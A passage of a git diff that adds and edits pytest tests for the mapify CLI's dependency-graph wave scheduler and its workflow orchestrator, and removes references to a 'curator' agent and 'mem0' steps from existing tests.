[["ST-001", "ST-002"], ["ST-003"]] + + def test_dangling_dependency_treated_as_root(self): + """Node with dependency not in graph is treated as having no deps.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=["ST-MISSING"])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + + waves = graph.compute_waves() + assert waves == [["ST-001"], ["ST-002"]] + + +class TestSplitWaveByFileConflicts: + """Tests for split_wave_by_file_conflicts().""" + + def test_no_overlap_single_sub_wave(self): + """No file overlap: all subtasks in one sub-wave.""" + graph = DependencyGraph() + wave = ["ST-002", "ST-003", "ST-004"] + files = { + "ST-002": {"a.py"}, + "ST-003": {"b.py"}, + "ST-004": {"c.py"}, + } + result = graph.split_wave_by_file_conflicts(wave, files) + assert result == [["ST-002", "ST-003", "ST-004"]] + + def test_partial_overlap_splits_into_sub_waves(self): + """Partial overlap: conflicting subtasks in separate sub-waves.""" + graph = DependencyGraph() + wave = ["ST-002", "ST-003", "ST-004"] + files = { + "ST-002": {"a.py"}, + "ST-003": {"b.py"}, + "ST-004": {"a.py"}, + } + result = graph.split_wave_by_file_conflicts(wave, files) + assert result == [["ST-002", "ST-003"], ["ST-004"]] + + def test_all_overlap_each_in_own_sub_wave(self): + """All subtasks share files: each in its own sub-wave.""" + graph = DependencyGraph() + wave = ["ST-001", "ST-002", "ST-003"] + files = { + "ST-001": {"shared.py"}, + "ST-002": {"shared.py"}, + "ST-003": {"shared.py"}, + } + result = graph.split_wave_by_file_conflicts(wave, files) + assert result == [["ST-001"], ["ST-002"], ["ST-003"]] + + def test_empty_affected_files_placed_alone(self): + """Subtasks with empty affected_files are placed in their own sub-wave.""" + graph = DependencyGraph() + wave = ["ST-001", "ST-002", "ST-003"] + files = { + "ST-001": {"a.py"}, + "ST-002": set(), # empty = unknown + "ST-003": {"b.py"}, + } + result = graph.split_wave_by_file_conflicts(wave, files) 
+ # ST-002 should be alone, ST-001 and ST-003 can be together + assert ["ST-002"] in result + assert ["ST-001", "ST-003"] in result + + def test_missing_from_map_treated_as_empty(self): + """Subtask not in affected_files_map treated as empty (placed alone).""" + graph = DependencyGraph() + wave = ["ST-001", "ST-002"] + files = {"ST-001": {"a.py"}} # ST-002 missing + result = graph.split_wave_by_file_conflicts(wave, files) + assert ["ST-002"] in result + + def test_single_subtask_wave(self): + """Single subtask wave returns as-is.""" + graph = DependencyGraph() + result = graph.split_wave_by_file_conflicts(["ST-001"], {"ST-001": {"a.py"}}) + assert result == [["ST-001"]] + + def test_empty_wave(self): + """Empty wave returns empty list.""" + graph = DependencyGraph() + assert graph.split_wave_by_file_conflicts([], {}) == [] + + if __name__ == "__main__": pytest.main([__file__, "-v"]) diff --git a/tests/test_map_orchestrator.py b/tests/test_map_orchestrator.py new file mode 100644 index 0000000..b51b898 --- /dev/null +++ b/tests/test_map_orchestrator.py @@ -0,0 +1,284 @@ +""" +Tests for map_orchestrator.py — wave-based parallel execution commands. + +Validates: +- set_waves: computes execution_waves from blueprint +- get_wave_step: returns parallel/sequential mode +- validate_wave_step: advances per-subtask phase +- advance_wave: increments current_wave_index +- Backward compat: get_next_step works when execution_waves is empty +""" + +import json +import sys +from pathlib import Path + +import pytest + +# The orchestrator is a template script, not a regular package module. +# We need to import it from its template location. 
+ORCHESTRATOR_PATH = ( + Path(__file__).resolve().parents[1] + / "src" + / "mapify_cli" + / "templates" + / "map" + / "scripts" +) + +# Add the scripts directory to sys.path so we can import map_orchestrator +sys.path.insert(0, str(ORCHESTRATOR_PATH)) + +import map_orchestrator # noqa: E402 + + +@pytest.fixture +def branch_dir(tmp_path, monkeypatch): + """Create a temporary .map// directory and patch get_branch_name.""" + branch = "test-branch" + map_dir = tmp_path / ".map" / branch + map_dir.mkdir(parents=True) + (map_dir / "evidence").mkdir() + monkeypatch.chdir(tmp_path) + monkeypatch.setattr(map_orchestrator, "get_branch_name", lambda: branch) + return branch + + +@pytest.fixture +def sample_blueprint(tmp_path): + """Create a sample blueprint JSON with a fan-out DAG.""" + branch = "test-branch" + bp_dir = tmp_path / ".map" / branch + bp_dir.mkdir(parents=True, exist_ok=True) + blueprint = { + "subtasks": [ + { + "id": "ST-001", + "dependencies": [], + "affected_files": ["models.py"], + }, + { + "id": "ST-002", + "dependencies": ["ST-001"], + "affected_files": ["views.py"], + }, + { + "id": "ST-003", + "dependencies": ["ST-001"], + "affected_files": ["urls.py"], + }, + { + "id": "ST-004", + "dependencies": ["ST-002", "ST-003"], + "affected_files": ["tests.py"], + }, + ] + } + bp_file = bp_dir / "blueprint.json" + bp_file.write_text(json.dumps(blueprint), encoding="utf-8") + return str(bp_file) + + +class TestSetWaves: + """Tests for set_waves command.""" + + def test_set_waves_produces_correct_waves(self, branch_dir, sample_blueprint): + result = map_orchestrator.set_waves(branch_dir, sample_blueprint) + assert result["status"] == "success" + waves = result["execution_waves"] + assert waves[0] == ["ST-001"] + assert set(waves[1]) == {"ST-002", "ST-003"} + assert waves[2] == ["ST-004"] + + def test_set_waves_stores_in_state(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + state_file = 
Path(f".map/{branch_dir}/step_state.json") + state = json.loads(state_file.read_text(encoding="utf-8")) + assert len(state["execution_waves"]) == 3 + assert state["current_wave_index"] == 0 + + def test_set_waves_missing_blueprint(self, branch_dir): + result = map_orchestrator.set_waves(branch_dir, "/nonexistent.json") + assert result["status"] == "error" + assert "not found" in result["message"] + + def test_set_waves_splits_file_conflicts(self, branch_dir, tmp_path): + """Subtasks sharing files get split into sub-waves.""" + branch = branch_dir + bp_dir = tmp_path / ".map" / branch + bp_dir.mkdir(parents=True, exist_ok=True) + blueprint = { + "subtasks": [ + {"id": "ST-001", "dependencies": [], "affected_files": ["shared.py"]}, + {"id": "ST-002", "dependencies": [], "affected_files": ["shared.py"]}, + ] + } + bp_file = bp_dir / "blueprint.json" + bp_file.write_text(json.dumps(blueprint), encoding="utf-8") + + result = map_orchestrator.set_waves(branch, str(bp_file)) + assert result["status"] == "success" + # Both are roots (wave 0) but share files, so should be split + waves = result["execution_waves"] + assert len(waves) == 2 + assert waves[0] == ["ST-001"] + assert waves[1] == ["ST-002"] + + +class TestGetWaveStep: + """Tests for get_wave_step command.""" + + def test_parallel_mode_for_multi_subtask_wave(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + # Advance past wave 0 (single subtask) + map_orchestrator.advance_wave(branch_dir) + result = map_orchestrator.get_wave_step(branch_dir) + assert result["mode"] == "parallel" + assert len(result["subtasks"]) == 2 + + def test_sequential_mode_for_single_subtask_wave( + self, branch_dir, sample_blueprint + ): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + result = map_orchestrator.get_wave_step(branch_dir) + assert result["mode"] == "sequential" + assert len(result["subtasks"]) == 1 + assert result["subtasks"][0]["subtask_id"] == "ST-001" + + def 
test_is_complete_when_all_waves_done(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + # Advance past all 3 waves + map_orchestrator.advance_wave(branch_dir) + map_orchestrator.advance_wave(branch_dir) + map_orchestrator.advance_wave(branch_dir) + result = map_orchestrator.get_wave_step(branch_dir) + assert result["is_complete"] is True + + def test_no_waves_returns_complete(self, branch_dir): + """When no waves configured, returns complete with sequential message.""" + # Initialize state without waves + state = map_orchestrator.StepState() + state.save(Path(f".map/{branch_dir}/step_state.json")) + result = map_orchestrator.get_wave_step(branch_dir) + assert result["is_complete"] is True + assert result["mode"] == "sequential" + + +class TestValidateWaveStep: + """Tests for validate_wave_step command.""" + + def test_advances_subtask_phase(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + result = map_orchestrator.validate_wave_step("ST-001", "2.0", branch_dir) + assert result["valid"] is True + assert result["next_phase"] == "2.1" + + def test_actor_step_advances_to_monitor(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + # Create evidence file for actor step + evidence_dir = Path(f".map/{branch_dir}/evidence") + evidence = { + "phase": "actor", + "subtask_id": "ST-001", + "timestamp": "2026-01-01T00:00:00Z", + } + (evidence_dir / "actor_ST-001.json").write_text( + json.dumps(evidence), encoding="utf-8" + ) + result = map_orchestrator.validate_wave_step("ST-001", "2.3", branch_dir) + assert result["valid"] is True + assert result["next_phase"] == "2.4" + + def test_missing_evidence_blocks_validation(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + result = map_orchestrator.validate_wave_step("ST-001", "2.3", branch_dir) + assert result["valid"] is False + assert "Evidence 
file missing" in result["message"] + + +class TestAdvanceWave: + """Tests for advance_wave command.""" + + def test_increments_wave_index(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + result = map_orchestrator.advance_wave(branch_dir) + assert result["status"] == "success" + assert result["current_wave_index"] == 1 + assert result["is_complete"] is False + + def test_is_complete_after_last_wave(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + map_orchestrator.advance_wave(branch_dir) # wave 1 + map_orchestrator.advance_wave(branch_dir) # wave 2 + result = map_orchestrator.advance_wave(branch_dir) # wave 3 (past end) + assert result["is_complete"] is True + + def test_resets_subtask_phases(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + # Set some phases + state_file = Path(f".map/{branch_dir}/step_state.json") + state = map_orchestrator.StepState.load(state_file) + state.subtask_phases = {"ST-001": "2.4"} + state.save(state_file) + # Advance wave + map_orchestrator.advance_wave(branch_dir) + state = map_orchestrator.StepState.load(state_file) + assert state.subtask_phases == {} + + def test_no_waves_returns_error(self, branch_dir): + state = map_orchestrator.StepState() + state.save(Path(f".map/{branch_dir}/step_state.json")) + result = map_orchestrator.advance_wave(branch_dir) + assert result["status"] == "error" + + +class TestBackwardCompat: + """Verify get_next_step works when execution_waves is empty.""" + + def test_get_next_step_without_waves(self, branch_dir): + """Standard sequential flow works when no waves are configured.""" + state = map_orchestrator.StepState() + state.save(Path(f".map/{branch_dir}/step_state.json")) + result = map_orchestrator.get_next_step(branch_dir) + assert result["step_id"] == "1.0" + assert result["phase"] == "DECOMPOSE" + assert result["is_complete"] is False + + def 
test_state_serialization_with_wave_fields(self, branch_dir): + """State with wave fields serializes and deserializes correctly.""" + state = map_orchestrator.StepState() + state.execution_waves = [["ST-001"], ["ST-002", "ST-003"]] + state.current_wave_index = 1 + state.subtask_phases = {"ST-002": "2.3"} + state.subtask_retry_counts = {"ST-002": 1} + + state_file = Path(f".map/{branch_dir}/step_state.json") + state.save(state_file) + + loaded = map_orchestrator.StepState.load(state_file) + assert loaded.execution_waves == [["ST-001"], ["ST-002", "ST-003"]] + assert loaded.current_wave_index == 1 + assert loaded.subtask_phases == {"ST-002": "2.3"} + assert loaded.subtask_retry_counts == {"ST-002": 1} + + def test_old_state_file_loads_with_defaults(self, branch_dir): + """State file without wave fields loads with sensible defaults.""" + old_state = { + "workflow": "map-efficient", + "current_step_id": "2.0", + "current_step_phase": "XML_PACKET", + "subtask_sequence": ["ST-001"], + # No wave fields + } + state_file = Path(f".map/{branch_dir}/step_state.json") + state_file.write_text(json.dumps(old_state), encoding="utf-8") + + loaded = map_orchestrator.StepState.load(state_file) + assert loaded.execution_waves == [] + assert loaded.current_wave_index == 0 + assert loaded.subtask_phases == {} + assert loaded.subtask_retry_counts == {} + + +if __name__ == "__main__": + pytest.main([__file__, "-v"]) diff --git a/tests/test_mapify_cli.py b/tests/test_mapify_cli.py index a1c72ff..405cf33 100644 --- a/tests/test_mapify_cli.py +++ b/tests/test_mapify_cli.py @@ -188,7 +188,6 @@ def test_init_basic(self, tmp_path): assert "Bash(go test *)" in allow assert "Bash(go vet *)" in allow assert "Bash(go mod tidy *)" in allow - assert "mcp__mem0__*" in allow assert "mcp__sourcecraft__list_pull_request_comments" in allow assert "Bash(make generate manifests)" in allow assert "Bash(make manifests)" in allow @@ -613,7 +612,6 @@ def test_create_agent_files_fallback(self, 
mock_get_templates, tmp_path): "predictor.md", "evaluator.md", "reflector.md", - "curator.md", "documentation-reviewer.md", ] diff --git a/tests/test_template_sync.py b/tests/test_template_sync.py index a5205fa..ecfd315 100644 --- a/tests/test_template_sync.py +++ b/tests/test_template_sync.py @@ -37,10 +37,9 @@ def templates_agents_dir(self, project_root): @pytest.fixture def expected_agents(self): - """List of expected agent template files (all 12 agents).""" + """List of expected agent template files (all 11 agents).""" return [ "actor.md", - "curator.md", "debate-arbiter.md", "documentation-reviewer.md", "evaluator.md", @@ -116,7 +115,6 @@ def test_no_missing_files_in_templates( "monitor.md", "predictor.md", "evaluator.md", - "curator.md", "reflector.md", "task-decomposer.md", "documentation-reviewer.md", diff --git a/tests/test_workflow_gate.py b/tests/test_workflow_gate.py index 5a2027f..370aeba 100644 --- a/tests/test_workflow_gate.py +++ b/tests/test_workflow_gate.py @@ -175,7 +175,6 @@ def test_blocks_edit_without_actor(self, tmp_path: Path) -> None: "completed_steps": { "ST-001": [ "xml_packet", - "mem0_search", ] # Missing actor and monitor }, "pending_steps": { @@ -211,7 +210,6 @@ def test_blocks_edit_without_monitor(self, tmp_path: Path) -> None: "completed_steps": { "ST-001": [ "xml_packet", - "mem0_search", "actor", ] # Missing monitor }, @@ -243,7 +241,7 @@ def test_allows_edit_after_actor_and_monitor(self, tmp_path: Path) -> None: "workflow": "map-efficient", "current_subtask": "ST-001", "completed_steps": { - "ST-001": ["xml_packet", "mem0_search", "actor", "monitor"] + "ST-001": ["xml_packet", "actor", "monitor"] }, "pending_steps": {"ST-001": ["tests", "linter"]}, }